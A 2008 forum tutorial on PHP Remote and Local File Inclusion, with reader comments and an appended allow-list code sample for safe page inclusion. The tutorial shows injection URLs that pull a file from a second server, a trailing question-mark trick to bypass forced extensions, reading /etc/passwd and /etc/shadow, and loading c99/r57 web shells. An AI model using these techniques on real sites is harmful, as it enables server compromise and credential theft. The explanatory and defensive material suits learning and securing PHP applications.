
The basics of Remote File Inclusion

Many people have heard of it, seen it, and may have tried it. But do they really know what it does? Because there are still a lot of people who do not know what RFI (Remote File Inclusion) actually is, or does, I have decided to write a little(?) tutorial about it. It will basically just explain and 'show' how RFI actually works, and help you understand the basics.

After reading this, you should be able to recognize RFIs, and you will be able to find and use it. At least, that's what I think.

Since this is my first 'tutorial', I would like to have your opinion on it, so leave me a comment.

- KnickLighter's Tutorial

Welcome to KnickLighter

I recommend checking this tutorial out. I learned a bit about a few things I didn't know before.

Thanks KnickLighter!

V.

You're welcome

You're welcome, I hope more people find this piece of text useful :)

RFI

Thanks bro!
I've already read your tutorial...!
I clearly understand the whole tutorial.
But..!
I have some questions about the following statement:
***We will now create an other file on Server 1, which we will call "test.txt". This file will only
contain the following:

***
I mean, how do I create this file on Server 1?
How do I make the inclusion on Server 1?

Can you explain more, please?
You can send e-mail to cableguy.lucifa.demon@gmail.com

:)

Hi, I saw that you had asked that question on my board too. I'll paste it here, in case more people don't understand it:

Hello cableguy,

This example just assumes that you have 2 servers of your 'own' on which you can create files.

In the first server, you will create the vulnerable page.

But then you will have to test the page, whether it's really vulnerable or not.

We try that with LFI, and later on with RFI.

Basically this is not really necessary, but we just test if your server is compatible with our vulnerability.

I hope that now you understand what it means.

Greetz,
~KL

Mirror

Title: PHP RFI (Remote File Inclusion) tutorial.
Author: KnickLighter
Date: 22-01-2008
Website: http://www.hackerarmy.org/

Base:

Remote File Inclusion, or RFI, may sound hard, but it's basically very easy. The title itself already explains a bit about it. You will basically include a file on a server, which is hosted on another server. With RFI, you use a URL-based type of 'hacking'.

Of course, this will only be possible if the server supports PHP and allows Remote URL access. Let's make an example of an RFI. Say we have "server1.com" as vulnerable, and we have our file hosted on "server2.com". Both servers' httpd root directories are "/var/www".

Server 1 has a vulnerability in their index.php. Server 2 contains our code which we want to include on Server 1. This is what a simple (and vulnerable) inclusion looks like, which we use as an example in the index.php of Server 1:

Now before we continue with RFI, and the file on Server 2, we will first test the code on the first server with LFI (Local File Inclusion), which is the same as RFI, only this method uses files which are hosted on the current (local) server, not a remote server. This method is often used in Linux to get "/etc/passwd" and sometimes "/etc/shadow".

We will now create another file on Server 1, which we will call "test.txt". This file will only contain the following:

Now we can test our inclusion on Server 1. We will include "test.txt" to see if it's working. An inclusion looks like "index.php?page=file", since we use "$page" and "$_GET['page']", so the URL will be:
http://server1.com/index.php?page=test.txt

If it works, you should see the text on the page, which will be:
Hello, this is a test.

If you did not create the test.txt, or if it's just not there, you should see the following error:

Warning: main(test.txt) [function.main]: failed to open stream: No such file or directory in /var/www/index.php on line 1

Remember that some servers have URL access disabled. This makes it impossible to include external (or Remote) files. This means you can not use "http://" or "ftp://" in an inclusion, but sometimes you can still use LFI on those websites.

Ok, so now we know that the inclusion works. We can now create our file on Server 2. Let's call it "include.txt". This file will contain the following:

Now you are ready to do your RFI. It looks like this:

SERVER 1                               SERVER 2
http://server1.com/index.php?page=     http://server2.com/include.txt
                 \                       /
                  \                     /
                   \___________________/

 ___________________________________________________________________
| http://server1.com/index.php?page=http://server2.com/include.txt |
 -------------------------------------------------------------------

That is how your final URL should be. If it works, you'll see the text of include.txt in the page of Server 1. Which will be:
Your RFI seems to be working.

Now there's something you should remember, and that is that some websites already have a filetype configured in their include script, such as:

Then if you use "index.php?page=test", it will include "test.html" on the local server. If this is the case, then your "http://server2.com/include.txt" will not work. You can bypass this by placing a question mark after your own URL, so it will be "http://server2.com/include.txt?".

Then the URL should look like:
http://server1.com/index.php?page=http://server2.com/include.txt?

What this will do is include "http://server2.com/include.txt?.html", but because of your question mark, it will forget about ".html" and will just include your URL.

However, this is not all you can do with RFI. You can also include shell scripts, such as "c99" and "r57". These scripts will allow you to execute commands or do lots of other things on the server.

For my own websites, I also use inclusions, but I've blocked the ability to use RFI. Here's a little bit of code which can help you on your way to secure your own pages:

This code will first check if the file which is requested, exists. If so, it includes it. If not, it will simply include home.php.

-
I hope this tutorial helped you to understand about RFI and how to use it. If you still have any questions or whatever, just contact me.

Also join me on IRC:
irc.hackerarmy.org 6667
#home
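
The safe-inclusion check described in the tutorial above, as an added example that is not KnickLighter's code: it swaps the file-existence test for an allow-list, because an existence test alone still accepts any local path. PAGES_DIR, ALLOWED_PAGES, resolve_page() and the page file names other than home.php are assumptions.

```php
<?php
// Added example, not the tutorial's code. PAGES_DIR, ALLOWED_PAGES and
// resolve_page() are hypothetical names; the page files are assumed to exist.
//
// php.ini: allow_url_include = Off (the default) already stops include()
// from fetching http:// or ftp:// URLs. The allow-list below also covers
// local paths such as ../../etc/passwd.

const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [              // ?page= value => file under PAGES_DIR
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/** Map the untrusted ?page= value to a path that is safe to include. */
function resolve_page($requested): string
{
    // Reject arrays (?page[]=x) and any name that is not a known key.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        $requested = 'home';         // same fallback the tutorial describes
    }
    // The path is assembled from constants only, never from request data.
    return PAGES_DIR . '/' . ALLOWED_PAGES[$requested];
}

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs: one valid page, the tutorial's URLs, a
    // traversal path, and an array parameter.
    $samples = [
        'about',
        'test.txt',
        'http://server2.com/include.txt',
        'http://server2.com/include.txt?',
        '../../etc/passwd',
        ['about'],
    ];
    foreach ($samples as $input) {
        $shown = json_encode($input, JSON_UNESCAPED_SLASHES);
        printf("%-36s -> %s\n", $shown, basename(resolve_page($input)));
    }
} else {
    // Web request: only a file named in ALLOWED_PAGES can ever be included.
    include resolve_page($_GET['page'] ?? 'home');
}
```

Run from the command line, every sample except 'about' resolves to home.php, including the URL with the trailing question mark, since the request value is only ever used as a lookup key.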

Updated

Yeah, hackerarmy.org is gone, the link has been updated now, sorry for the delay :d